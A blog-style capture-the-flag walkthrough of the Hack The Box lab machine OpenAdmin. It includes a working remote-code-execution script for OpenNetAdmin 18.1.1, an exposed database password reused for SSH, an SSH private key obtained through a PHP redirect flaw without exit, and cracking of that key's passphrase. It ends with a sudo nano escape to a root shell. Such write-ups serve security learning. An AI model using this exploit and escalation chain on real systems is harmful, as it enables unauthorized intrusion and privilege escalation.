Hack The Box — OpenAdmin 10.10.10.171 Writeup

Fahmi J
6 min readMay 1, 2020

OpenAdmin is an easy difficulty box from Hack The Box that starts off by finding an instance of OpenNetAdmin. This application is known to be vulnerable to a remote code execution, which then can be leveraged to gain a foothold on the system and then obtain a reused database credentials. The first user has an access to web resources that is is currently hosted internally. The internal web has a logic flaw that allows me to obtain the SSH key of the second user. The second user is allowed to run a nano editor with sudo privileges, this can be abused to gain root access.

Reconnaissance

I’ll start with port scanning using nmap

Nmap

nmap -sV -sC -oA OpenAdmin 10.10.10.171
  • -sC, to scan with default script
  • -sV, to scan service version
  • -oN, to save the output to .nmap file
  • -V, to verbose during the scan.
Nmap scan report for openadmin.htb (10.10.10.171)
Host is up (0.16s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
| 256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
|_ 256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

From the scan results, nmap found two open ports:

  • An SSH service running on port 22
  • An HTTP service running on port 80

Also from the scan above, the machine is likely running Ubuntu.

As SSH usually requires valid credentials and there’s is no straight exploit yet, hence further enumeration is needed.

Enumeration

TCP 80 — Website

Visiting port 80 only displays the default Apache page.

Directory Brute Force

Performing directory brute force on the web using dirb discovered a few hidden web directories.

$ dirb http://openadmin.htb/ /usr/share/wordlists/dirb/common.txt -r... <snip> ...
---- Scanning URL: http://openadmin.htb/ ----
==> DIRECTORY: http://openadmin.htb/artwork/
+ http://openadmin.htb/index.html(CODE:200|SIZE:10918)
==> DIRECTORY: http:/openadmin.htb/music/
+ http://openadmin.htb/server-status (CODE:200|SIZE:278)
... <snip> ...

:: http://openadmin.htb/artwork/

:: http://openadmin.htb/music/

The /music home page provides a login menu that points to http://openadmin.htb/ona

:: /ona

Visiting /ona/ brings me to an instance of OpenNetAdmin. It is a software for managing network related things.

Ok, from music page to networking, doesn’t make any sense to me

There’s a warning on the page. It’s complaining about not running the latest version compared to the one currently in use (v18.1.1)

Foothold

Exploit PoC for OpenNetAdmin 18.1.1

Based on the version above, a quick search on exploit-db shows that the current instance of OpenNetAdmin is vulnerable to Remote Code Execution. The exploit poc source code is as follows:

OpenRCE.sh

#!/bin/bashURL="${1}"
while true;do
echo -n "$ "; read cmd
curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
done

The exploit PoC is saved as OpenRCE.sh and below is the issued command to run the exploit.

./OpenRCE.sh http://openadmin.htb/ona/

Shell as jimmy

Upon enumerating the current working directory, a database credential is found in ./local/config/database_settings.inc.php.

$ cat /opt/ona/www/local/config/database_settings.inc.php
<?php
$ona_contexts=array (
'DEFAULT' =>
array (
'databases' =>
array (
0 =>
array (
'db_type' => 'mysqli',
'db_host' => 'localhost',
'db_login' => 'ona_sys',
'db_passwd' => 'n1nj4W4rri0R!',
'db_database' => 'ona_default',

'db_debug' => false,
),
),
'description' => 'Default data context',
'context_color' => '#D3DBFF',
),
);

These are two users available in /home directory.

$ cat /etc/passwd | grep sh$
root:x:0:0:root:/root:/bin/bash
jimmy:x:1000:1000:jimmy:/home/jimmy:/bin/bash
joanna:x:1001:1001:,,,:/home/joanna:/bin/bash

The password from database config is reused by user jimmy. But the user flag can not be found in jimmy’s home directory.

The find command is issued to search files that is accessible or owned by user jimmy.

find / -type f -user jimmy 2>/dev/null

It successfully reveals that user jimmy has access to files in /var/www/internal/.

Based on apache config, /var/www/internal is currently hosted locally on port 52846.

$ cat /etc/apache2/sites-enabled/internal.conf 
Listen 127.0.0.1:52846

<VirtualHost 127.0.0.1:52846>
ServerName internal.openadmin.htb
DocumentRoot /var/www/internal

<IfModule mpm_itk_module>
AssignUserID joanna joanna
</IfModule>

ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined

</VirtualHost>

Code review — Improper Redirection

After inspecting the main.php source code from /var/www/internal/, a logic flaw was found on the first line.

<?php session_start(); if (!isset ($_SESSION['username'])) { header("Location: /index.php"); }; 
# Open Admin Trusted
# OpenAdmin
$output = shell_exec('cat /home/joanna/.ssh/id_rsa');
echo "<pre>$output</pre>";
?>
<html>
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session
</html>

This line code has an improper redirection.

<?php session_start(); 
if (!isset ($_SESSION['username'])) {
header("Location: /index.php");
};
...<snip>...
$output = shell_exec('cat /home/joanna/.ssh/id_rsa');
echo "<pre>$output</pre>";
?>
...<snip>...

The code above checks users’ sessions but it’s not complete yet because the die() or exit() function is missing, so the rest of the code below will be executed as well

Therefore, sending a normal request with curl (default without -L option) will prevent the page from redirection and then it renders joanna's SSH key.

jimmy@openadmin:~$ curl -s http://127.0.0.1:52846/main.php

Cracking SSH Password

The private key is encrypted with a password. JtR can be used to crack an encrypted SSH key, but first, it must be converted to the hash form and this can be done by using ssh2john.py

python ssh2john.py joanna_rsa > joanna_rsa.hash

Once the hash copied to my Windows, the cracking is attempted using John-the-Ripper.

Shell as joanna

I successfully logged in as user joanna via SSH using the cracked password.

ssh -i joanna_rsa joanna@10.10.10.171

User flag is done here.

Privilege Escalation

Abusing sudo nano

User joanna has sudo privileges on /bin/nano

On linux boxes, whenever you own a valid user password, always check sudo -l !

joanna@openadmin:~$ sudo -l
Matching Defaults entries for joanna on openadmin:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User joanna may run the following commands on openadmin:
(ALL) NOPASSWD: /bin/nano /opt/priv

A quick way to read the root flag is by issuing the command below,

joanna@openadmin:~$ sudo /bin/nano /opt/priv

and then hit CTRL + R to open a file, this allows us to read the root flag /root/root.txt

From GTFOBins page, escalation from user joanna to gain root shell as follows:

joanna@openadmin:~$ sudo /bin/nano /opt/priv # Opening nano as root
^R^X # CTRL+R (read/open file), CTRL+X(execute command)
reset; sh 1>&0 2>&0 # Escape from nano

--

--

Fahmi J

Just curious to learn how things work, especially in digital world.